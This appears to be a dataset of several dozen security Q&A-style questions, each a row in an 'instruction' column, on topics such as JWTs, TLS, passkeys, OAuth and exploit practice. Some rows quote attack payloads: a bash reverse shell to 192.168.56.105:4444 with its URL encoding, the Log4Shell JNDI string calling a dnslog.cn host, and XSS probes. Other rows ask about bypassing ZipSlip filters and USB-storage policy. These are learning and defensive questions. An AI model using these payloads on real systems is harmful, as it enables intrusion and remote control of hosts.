instruction
stringlengths
24
29.9k
I am trying to exploit a use-after-free that was previously patched for practice/to get good :) I am trying to bypass ALSR and get code execution in the process. The program allocates an object in the scope of a function, then frees it (overwrites most of its values with a5s). There is a JS callback, and once that comp...
I have a server running multiple docker containers, accessible through tunneling. I want to create a new tunnel that is separate from the one I already have. Will the new tunnel service interfere or expose the other containers running under the other tunnel? For example, I have a Cloudflare tunnel to allow access via W...
If I administer a webpage that allows users to create accounts, and assuming I don't keep or even ever have access to plaintext passwords, is it possible for me to detect that one of my users is using a known bad password? I am guessing that if I salt my password hashes, which I do, this means there is no way of detect...
Now that almost all users use only a few email providers, is email content secure from interception? This related question was closed referencing a question about the security of SMTP IMAP, and POP: How secure is email now? However, things have changed over the years so that that question may not be relevant in all ca...
I am familiar with web security but I would like to know more about non-web application security. I know about memory corruption vulnerabilities like buffer overflow and buffer overread and how serious they are. But how about Java/C# or similar applications, where memory corruption vulnerabilities are far less common. ...
We've got an Angular app that calls APIs with JWT token authentication (so an auth token and a refresh token). Now at some point the user changes his password (while normally logged in, so not with a "reset password" logic when he can't login anymore) so we call /change-password endpoint Currently we keep the user logg...
During a pentest I have found a JWT that seems to be a refresh-token issued by some IAM software. The scope field in the JWT lists all the applications as URLs that this token can be used to obtain access tokens for. From an attacker perspective this seems like a gold mine especially since: being a refresh-token its v...
I am currently using this code to have the public key pinning OkHttpClientFactory okHttpClientFactory = () -> { CertificatePinner certificatePinner = new CertificatePinner.Builder() .add(domain, "sha256/" + pin) .add(domain, "sha256/" + pin_backup) .build(); ...
I have an application that I want to secure with JWT tokens. For what I have read, the common practice is to have very short lived access tokens and very long lived refresh tokens, so that when an access token is required a refresh token can be used to get one. How is this better than having just long lived access toke...
When I try to connect to the site https://api-mte.itespp.org with OpenSSL (openssl s_client -connect api-mte.itespp.org:443 -brief), it complains that the DH key is too small. But when I analyze its certificate, it says the RSA key is 2048 which I understand is a standard size for a secure key. Also, when I analyze the...
Is there a "magic" mifare classic card that enables you to change access conditions even if current access conditions are set to never change access conditions? (write ACS: never)
I did some penetration testing of services reachable by URL and managed to find some vulnerabilities I was looking for. However, now I should run tests for some services that are not reachable by URL, but rather by their IP inside the VPN. I am connected to the VPN through NetExtender. Using the same configuration used...
Context I've been recently looking at UUIDs (mostly v4) and their uses to maybe start using them in some of my apps. I started asking myself some question about security as one does. Then I fell on the Is it safe to rely on UUIDs for privacy? question which led me to Are random URLs a safe way to protect profile photos...
Uses Chromium 115 when current stable is 118. They do claim to have the latest chromium security updates. Does patching old chromium with the latest security fixes bring it on par with the latest chromium version?
I'm a bit confused with PKCS11 (v3) standard... In particular, it's blurry to me if one can invoke C_DeriveKey, passing, say, CKM_SHA512_KEY_DERIVATION (or some HKDF) to it as the mechanism and also set the following in the template: CKA_CLASS = CKO_PRIVATE_KEY CKA_KEY_TYPE = CKK_EC or CKA_KEY_TYPE = CKK_EC_EDWARDS s...
I am trying to figure out the best way to manage security certificates for embedded devices who's webpage is accessed via IP address, and then the scenario for when that IP address changes. Currently, I am creating an RSA private key to sign a trusted root certificate that I install on the local PC's trusted root certi...
Ross Ulbricht used a VPN server to connect to the Silk Road's server in order to configure the server.[¹] The FBI stated that Silk Road's server leaked its own IP address via a misconfigured login page, which allowed investigators to locate it in Reykjavik, Iceland,[²]. Note that Brian Krebs and others have disputed th...
For example, let's say my backend address is api.xyz.com, and I have a mobile application. This application sends requests to api.xyz.com. The application employs SSL pinning, where it pins the certificate it easily obtained from api.xyz.com. Is this really secure? If someone notices that my application is making reque...
I have some basic questions regarding eIDAS and 'Advanced Electronic Signatures'. Say, if I create a product under my company Acme Inc that offers a simple electronic signature where I sign every completed document digitally with a digital certificate that attests to the identity of Acme Inc (while providing an additio...
Let's say I want to download a golang. How to understand which website is official for a project without referring to a some kind of authority like Wikipedia or a search engine rank? Is there a mechanism to find which website is official and created by authors of the project and it is part of the project? Which one is ...
I am currently using XAMPP installed on windows to do a brute-force attack to DVWA. The command prompt that I used is Ubuntu, but the virtual machine is not opened and installed. Just a command prompt from Ubuntu that opened at Windows. I am learning the brute-force attack from youtube. Which the URL is https://www.you...
I would like to ask, if Firejails on Linux, protects when clicking a malicious link in the browser e.g. from downloading a keylogger or a trojan.
I've read about this but I don't fully understand how to choose. I have two options: Public client "A native, browser or mobile-device app. Cognito API requests are made from user systems that are not trusted with a client secret." Confidential client "A server-side application that can securely store a client secre...
I have a Galaxy Tab device, but have already signed out from it and reset the tab to factory. However, in my Google account, there is still a device of "Galaxy Tab", added 200+ days ago, in the "Security > Google prompts" section, although I have already revoked all the devices in the "Security > Your devices" section....
I'm reading this presentation https://drive.google.com/file/d/1aeNq_5wVwHRR1np1jIRQM1hocrgcZ6Qu/view?pli=1 And I couldn't understand page 48, The author didn't say much about it, does anyone know how it works?
This feature is enabled by default. It says the usernames and passwords would be encrypted before sending to google. But google would know the encryption keys it used and to compare it with leaked username/password combinations the google servers has to decrypt it at some point. I use different passwords for different ...
I'm reading the CISSP official study guide and quote In addition to verifying the reliability of security controls, an assessment should consider whether security controls affect privacy. Some controls may improve privacy protection, whereas others may in fact cause a breach of privacy. What kind of security control ...
Is the 32 OATH QR code account limit on Yubikeys due to a storage constraint? Because the Yubikey 5 series has been out for a few years now it'd be amazing if there is a new version released soon with increased OATH account capacity.
There's a webstore that i am trying to find a XSS vulnerability for BUG BOUNTY. On that store is a search bar that i can send anything https://www.examplestore.com/blog/?s=</title><script>alert(1);</script> But even if i use </title> for trying to break it, the result gets into: <title>You searched for </title><script...
Passkeys seems great for me as an individual, instead of passwords and TOTP tokens I can now slowly ditch the passwords and the somewhat annoying (but important!) TOTP tokens which I have locked in my phone. I have read that passkeys will be able to replace 2FA altogether, great! This also seems safe for me, the passke...
I am interested in standardizations for secure design and development of products, especially towards operational technology / IoT / ICS. My understanding of information security management systems via the ISO 27XXX and country-specific standards from NIST etc. is that they usually consider the complete organisation. T...
If we have a device that for some reason needs a public IP address and if at the same time the device should only be accessible from within a private network: Could the fact that the public IP of the device exists pose a security threat? I'm referring to scenarios: a) where all inbound traffic to the device from outsid...
Apple Silicon-based Macs have a LocalPolicy file that controls the secure boot process. To prevent replay attacks of the LocalPolicy, hashes of nonces are used. From here: The lpnh is used for anti-replay of the LocalPolicy. This is an SHA384 hash of the LocalPolicy Nonce (LPN), which is stored in the Secure Storage C...
I've recently obtained a new notebook, specifically a Thinkpad. Now I found out that it has a fingerprint reader integrated into the power button. I am skeptical about biometrics as a security mechanism. But I'm wondering, apart from its suitability for preventing unauthorized access, could the fingerprint reader itsel...
I'm trying to understand the goal of a digital signature in PKI/TLS. I understand that digital signature provide us Data integrity, Authentication and Non-repudiation. But, why is it necessary to use digital signatures in secure communication, considering that someone with access to the private key can change the digit...
I am trying to create a security checklist for developers/testers of web applications to make sure that the web app is compliant with all the security guidelines. When looking at the different standards available, I found OWASP top 10, OWASP ASVS, OWASP WSTG, and OWASP cheatsheets. I skimmed through them all, and each ...
I am to generate a file name that will be used for a ZIP file sent back to the user from a web app. I have no idea what OS that file will ultimately be saved to so I have to come up with a way to sanitise that file name on miltiple plateform (at the very least, it must be safe on Windows, Linux and Mac). The file name ...
I'm a beginner bug bounty hunter, and I recently came across a Self-XSS vulnerability during my security testing on a target website. The vulnerability occurs when I inject a payload into the X-Forwarded-For header of a web request. However, the security team of the bug bounty program denied my discovery, stating that ...
Is it okay to upload .env files containing client ID and client secret to elastic beanstalk? If not, what is the risk involved? How would one access those files?
In a scenario where a person wants to give away their device (magnetic disk included), leaving the disk usable for the receiver, how might that person go about destroying ALL data (except firmware) on the disk only via a digital medium? Encryption is not an answer, because the disk needs to be used by the receiver. Ass...
I was looking at the LXI Device Specification 2022 Version 1.6. For those not familiar with LXI, it is a standard for lab instruments like oscilloscopes, function generators, LCR meters and many more which have ethernet ports. You can connect these instruments to a network and control them from a PC. Usually, you can ...
My app has an input field that is used as a source for a HTML and PDF file. I also store this input in my database. My question is: Is it possible to somehow write something in the text field which would then give data away or even possibly harm my database? The content itself doesn't really query anything, as it is ju...
Imagine you have a website, for which you have configured a proper and secure session management / login system, using first-party / session cookies. Any interaction with that website is setup in the form of a REST API, so there are no HTML forms or similar; every interaction is a REST API request. Consequently, the en...
To facilitate push notifications, is it absolutely necessary for a browser to host servers to accomplish this? Each time I launch Firefox, prior to going to any websites, Firefox makes a connection to an Amazon AWS server that it maintains 24/7 (as long as the web browser it open). Anyone who knows how to monitor their...
I am using Fiddler, and I have to insert a CA Cert to decrypt the SSL certificate coming out of my device. My device running Android 13 is rooted, and when I installed my cert, it went into the user's section (as expected). However, I also tried to move the cert to my root certs folder (/system/etc/security/cacerts) an...
I work for an organization that seems to have awful IT practices, especially when it comes to security. I noticed most people do not lock their computers when they are away from the desk. I asked why this is and they told me that since accounts are shared everyone knows the password anyway. This is true, the IT departm...
I am wondering how this was possible. I remember my cousin used to use the family computer and it was infected with viruses just by browsing the internet. I recall a bunch of our desktop icons turned into ads for online casinos, and every time we opened internet explorer we were bombarded with ad popups. This was back ...
Please help me understand and solve this problem. Assumptions Let's start with an IoT design. When it is working correctly, a remote device has a pem certificate which is used to validate traffic to and from the server, which has holds the matching certificate. While the certificate is not expired, it works perfectly....
In terms of forensic disk imaging of a mechanical HDD, should a "write blocker" be used before the disk imaging process takes place?
When looking for a way to shrink the attack surface for pypi package-typo-squatting, I came across a package called pip-audit on an article on the RedHat blog. I attempted to use it, but I'm quite confused about how to use it when in different python environments. The tutorial states that you should create an environme...
Hi i´m a frontend developer and next week we will have a security audit i need to be sure that frontend side is secure and dont have vulnerabilities, so my question is, ¿What would you recommend or wich topics do you know about frontend security? I readed topics about XSS, CSRF, Clickjacking, NPM audit Angular escapes ...
What are the key components that define them and what are the differences? are there any standard structure of it? I've looked at several papers, and some of them using as a same, and some of them are not which makes me confused. I understand that the difference is that DoS involves a single device or attacker, whereas...
I am going through the Burpsuite Academy Training on Serverside security and I came across a section I am not able to grasp fully: Some application frameworks support various non-standard HTTP headers that can be used to override the URL in the original request, such as X-Original-URL and X-Rewrite-URL. If a web site u...
Background: At my place of work, we're trying to block all unapproved browsers on all Windows machines and the IT Security guys did a search on our internal infrastructure and came up with a list of all the hash values of the installed Verboten browsers, but I noticed that a bunch were missing from their list and as I'...
I have received a threatening message in my email primary@gmail.com from my other email address alias@mydomain.com. Note that alias@mydomain.com is an alias to primary@gmail.com. Also, of course, I own mydomain.com and it is registered in Google Domains. Message says my address alias@mydomain.com has been hacked and I ...
When sending emails in the context of an application that will send transactional or marketing emails, sometimes you want to include user-provided information in the body, like for example you ask the user for their name and you send an email with "Hi ${user_name}, ...". An attacker could say their name is https://evil...
When I installed Debian 12 LXQt ISO with the graphical install, it installed many proprietary firmware packages that were not needed and without my consent. Is it possible that proprietary firmware included in Debian default installation contains spyware that hides somewhere else (like viruses that are able to duplicat...
I am trying to use a user password in my application to both generate a password hash (for authentication) and to derive a secret key to encrypt user data. Using argon2 is an expensive operation so i only want to call it only once when the user is logging in, and because i need to store the hash in the database to auth...
I came across a packet capture in Wireshark where p length = 257 bytes and pubkey length = 256 bytes. See the ServerKeyExchange snip below: Diffie-Hellman Server Params p Length: 257 p: 00a81c7b6633732007ba19bf733fc5f6cf5d0c9f8e03ec4c3caebbe392bb8830b5cb1144… g Length: 1 g: 05 Pubkey Length: 256 ...
I try to put bash reverse shell as a URL parameter. The command is as follows: bash -i >& /dev/tcp/192.168.56.105/4444 0>&1 I have encoded the above code with URL encoding bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.105%2F4444%200%3E%261 But still, the problem is in interpreting the "&" character. Do you have any ...
I'm testing a Java application that tries to prevent ZipSlip by simply checking whether the filename contains ".." or "./" Since it's not a web application, I guess encoding is not an option. So, how can ZipSlip still happen in this case?
Is openssl enc considered secure enough to protect a bitcoin recovery passphrase? An attacker might get the encrypted text and invest several thousand dollars in computing power trying to decrypt it. The password is about 15 characters long The full command is: openssl enc -aes-256-cbc -salt -pbkdf2 -iter 10000000 -in ...
Some spammers keep filling each and every form-field with below: ${jndi:ldap://123.tgnndi.dnslog.cn/e} Maybe the $ part is supposed to trigger JQuery. What is this, is it a try to attack? If so, is it targetting our JS frontend or our PHP backend? What's best way and/or library to sanitize and/or prevent such attacks?...
Something you know (password), something you are (biometrics), something you have (key card/security key) are the typical authentication factors. Several years ago I've seen a paper in which the users authenticated via interaction. In that case it was something like a jump-and-run. The specific way how people played wa...
I just ran into something strange IMO. I created a RSA Key using nodejs cryptoutils to use with my JWT auth server. What I observer using jwt.io was the following: The last letter of the signature can be changed, and the jwt is still considered valid? In my case, the last part of the signed token is "fWh9F4hBm0IRHo6wv9...
Host: Win10 Guest: Linux Software: VirtualBox Clipboard information might not seem important, but it could very well contain a copied password or other useful data. On the host, clipboard history is also turned on. In VB, both clipboard and file sharing are turned off (disabled). Despite that, is it still possible for ...
I want to sell my iPhone but it has lots of personal data on it. Apple suggests to Erase All Content and Settings before selling an iPhone. Is this enough to reliably delete all data or will it be recoverable for a tech-savvy buyer?
I'm currently testing a mobile app (suppose it communicates with the domain blablabla.net). For the purposes of testing this app, I've set up an android machine on another netowrk, and I'm currently trying to set up burpsuite from my local machine to proxy it. Here's what I tried: Start burpsuite on port 8080 on my lo...
I have been exploring customer support in a website as part of bug bounty program. I then started a chat with their customer support and pasted the following in the box: <!--<img src="--><img src=x onerror=javascript:alert(1)//"> Without sending the message. Immediately, I got an alert in the browser. Is this consider...
I need to set up full disk encryption on my linux laptop. Questions: Does an encryption key on a USB pendrive protect against rubber-hose cryptanalysis? Is it true that the key on a pendrive is riskier than a password because someone can steal the USB key and access data without the need for the password? My threat m...
The old company I worked for is no longer around, I have put the laptop in a drawer and forgot about it. I wish to format the storage media and sell the whole laptop, as I could do make use of the the cash and I'm sure someone would like a decent laptop for a bargain. When I first tried to do a fresh install I ran into...
Windows 11 appears to have a Developer Mode. I was playing around with Flutter and got prompted to enable it. The setting looks like this: When I enable it, I get the following confirmation prompt: Turning on developer mode, including installing and running apps from outside the Microsoft Store, could expose your dev...
I have a Chromebook that normally only recognizes the actual webcam. However, I opened up a random webcam site and it was allowing me to use a second camera for some reason. When I enabled it, I realized that it was using the little fingerprint sensor that sits next to the keyboard. The displayed image was of my ceilin...
I am looking for any specifications, prior art, and known security considerations for a specific OAuth2 use case where: an authorization code grant is being performed. the client does not know the resource server ahead of time. the resource server will be determined by the authorization server, e.g. based on the user'...
I wonder if a firewall can support this case. There are two servers: A and B. A can send a request via an open port to B and B must respond to A during this connection. B cannot send a request on its own to A.
If this is possible, what is stopping a malicious file from adding an entry to \etc\hosts that points example.com to a phishing clone of a website? Usually, the browser warns you that the common name on the certs does not match up, but if you can change a SAN of the malicious website to example.com, then would browsers...
It has crossed my mind to include the requesting IP address in password reset emails. The intention being that if someone is receiving unexpected reset emails, this allows them to do a basic level of investigation. Ok, people can hide their IP address using a VPN, but for low-level attacks this is unlikely to happen. T...
How safe are installed & genuine-vendor signed old drivers, specifically when attackers are spoofing Microsoft and other vendor certificates? On older PCs and laptops where some components are no longer recognized by Windows Device Manager since Microsoft removes older drivers from their catalog periodically. Does thi...
To this date, is there a specification or a de-facto industry standard or how applications are supposed to perform certification path building in the context of X.509? I am specifically asking about the part of the certification path building process that retrieves all the necessary certificates. Certification path bu...
I Have a confusion here. From what I know, in TLS1.2, the Client sends Client Hello and then the Server Sends a Server Hello, Certificate(with its public key) and Certificate chain, and then a Server Hello Done. Then, the Client sends a Client Key exchange with a Pre-Master Secret encrypted with the public key of the s...
Does the browser pass the name of the camera being used to the website which is accessing our camera like when we use obs virtual cam so is the website able to detect that a virtual camera is being used?
I've got the issue that the Gmail app on Android (OnePlus One device) is unable to send messages (it stays in Outbox instead of Sent). Once in the past, I've solved this by clearing the Gmail app cache, another time by disabling and enabling Google account sync for Gmail (which is parallel to Contacts, Photos, etc). Sw...
We all know that the /authorize endpoint is a standard endpoint of OAuth 2. Below is how it's commonly called: GET /oauth2/authorize?client_id={client_id}&redirect_uri={redirect_uri}&response_type=code&tenantId={tenantId}&userId={user} We have introduced a custom query parameter to the authorize endpoint because we ar...
There was a project on GitHub that (was going to, if it hadn't been abandoned) modify TCP fields in order to evade packet sniffing. It explains in specifics how this would work here. In particular, this is what's specified: packets with a short time to live (TTL). this technique obtains the objective manipolating th...
How smart cards technically store their secrets? I know smart card is whole computer on chip and it respond only to challenges. I know their software/firmware doesn't allow (it doesn't have the feature for that at all) to ever reveal the secret to others. Anyway, the smart card must store secrets in its flash? Some cla...
We're building an application that needs to log into a website using built-in credentials. It's not optimal to say the least, but we're stuck with "knowing" the username and password beforehand (hence stick them into the application somehow) and can not rely on runtime user information. So I went through this StackOver...
When I turn on Warp provided by Cloudflare or use 1.1.1.1, it unlocks some of the websites which are geo locked. How does it unblock the websites which are blocked by ISP?
My partner recently got given work laptop and if you try and put in a USB mass storage device you get an error saying it is not allowed. Without having administrator access I assume this is via the group policy All Removable Storage Classes - Deny All Access. This got me thinking about how to bypass this. Just to clari...
Is there code/library to detect this vulnerability? I have been searching online and do not find any We are using Cloudflare which has fixed the issue but government says "we may" have the vulnerability as they have detected that we are using HTTP/2 It would be great if we could provide a tool for detecting it and stat...
My phone was stolen last week. I went to the police to track it but still now no result. What software can I use to track my device just using the IMEI of the phone?
I have a Windows executable file that has been code signed with a certificate from a Certificate Authority. The CA is listed in the official Microsoft Trusted Root Program list of participants. The level of my cert is Open Source, which is below EV and Standard, so reputation must be built. Is the reputation attached ...
Linux pass is a program that lets you store passwords in regular text files, which you it then encrypts with your GPG key. I'm confused at how this is considered secure. The GPG key has a passphrase but looks like it normally gets cached in the agent, so you very rarely need to enter it. Usually, pass some/password jus...
I need to run the following inline script to inject some Thymeleaf model variables into a javascript file of mine. <script th:inline="javascript"> /*<![CDATA[*/ var stripePublicKey = /*[[${stripePublicKey}]]*/ null; var stripeReturnUrl = /*[[${stripeReturnUrl}]]*/ null; var paymentType = /*[[${payment...
I remember having read a blog post or a forum post, some years ago, about a TrueCrypt user whose Windows machine sometimes, at boot, did not ask for the TC passphrase and decrypted automatically the volume. It turned out Windows, in some circumstances, cached the passphrase. Obviously this is an enormous vulnerability...
When referring to key types and lengths, is there a correct order to stating the type and length? For example, would I use "2048-bit RSA key" or "RSA 2048-bit key" in documentation? Or just simply be consistent with whatever I choose to use?
When I view the PDF file in a browser such as FireFox without downloading the file into my PC, does FireFox temporarily store the PDF file in my PC? I heard that FireFox has been sandbox heavily and there is no need to worry about malicious PDF file downloading to PC, is this true? What about previewing the PDF file in...
It seems a hacker is using my phone number to make fraudulent account, and I would like to prevent that. Usually, if a person has your phone number, they're not able to make an account because a verification code is sent which a hacker wouldn't be able to see. Strangely, I have found that several services have my phone...
So I have a few PDFs on my computer I got online a few years ago on my Mac computer. When I ran a virus total scan on some of them I got a couple that were concerning. Here is the one that most concerned me: https://www.virustotal.com/gui/file/3163f47f0820f5e4ac7a22d2fd55b19e363d529b3b8a36ea58756f6318550031/behavior H...
I've an android and ios app. They run on the same application server on Linux. I want to capture the packets when users are trying to log in to the app. How do I proceed? I'm thinking of doing it with tcpdump and putting that pcap file into wireshark. Will this work? I am asking if this works because lots of change req...
Considering an attacker may be able to leverage the information gathered from standard endpoints/configuration files such as /.well-known/oauth-authorization-server and /.well-known/openid-configuration, is it considered best practice to not allow them to be publicly accessible?